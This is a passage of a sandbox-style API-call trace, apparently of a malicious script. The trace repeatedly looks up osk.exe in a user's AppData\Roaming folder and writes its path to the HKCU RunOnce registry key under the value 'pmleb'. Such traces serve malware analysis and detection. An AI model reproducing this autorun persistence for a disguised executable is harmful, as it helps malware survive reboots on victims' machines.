returned 0x0 [0077.887] RegCloseKey (hKey=0x280) returned 0x0 [0077.887] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.887] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.887] SetTimer (hWnd=0x20280, nIDEvent=0x2019, uElapse=0xa, lpTimerFunc=0x0) returned 0x2019 [0077.887] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.896] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.896] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.897] KillTimer (hWnd=0x20280, uIDEvent=0x2019) returned 1 [0077.897] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.897] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.897] IUnknown:Release (This=0x787518) returned 0x1 [0077.897] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.897] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.897] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.897] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.897] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.898] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.898] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.898] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.898] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.898] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1a [0077.898] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.898] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x1b [0077.898] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.899] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1a [0077.899] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.899] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.899] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.899] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.899] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.899] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.899] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.899] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.899] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.899] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.899] RegCloseKey (hKey=0x280) returned 0x0 [0077.899] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.899] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.900] SetTimer (hWnd=0x20280, nIDEvent=0x201a, uElapse=0xa, lpTimerFunc=0x0) returned 0x201a [0077.900] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.912] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.912] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.913] KillTimer (hWnd=0x20280, uIDEvent=0x201a) returned 1 [0077.913] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.913] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.913] IUnknown:Release (This=0x787518) returned 0x1 [0077.913] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.913] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.913] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.913] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.913] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.913] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.913] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.914] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.914] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.914] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1b [0077.914] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.914] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x1c [0077.914] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.914] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1b [0077.915] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.915] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.915] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.915] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.915] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.915] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.915] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.915] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.915] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.915] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.915] RegCloseKey (hKey=0x280) returned 0x0 [0077.915] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.916] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.916] SetTimer (hWnd=0x20280, nIDEvent=0x201b, uElapse=0xa, lpTimerFunc=0x0) returned 0x201b [0077.916] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0078.067] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0078.067] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0078.067] KillTimer (hWnd=0x20280, uIDEvent=0x201b) returned 1 [0078.067] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.067] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0078.068] IUnknown:Release (This=0x787518) returned 0x1 [0078.068] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0078.068] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0078.068] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0078.068] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0078.068] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0078.068] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0078.068] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0078.068] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0078.068] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0078.069] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1c [0078.069] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0078.069] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x1d [0078.069] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0078.071] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1c [0078.071] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.071] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0078.071] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.071] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.071] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0078.071] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0078.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0078.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0078.071] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0078.072] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0078.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0078.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS 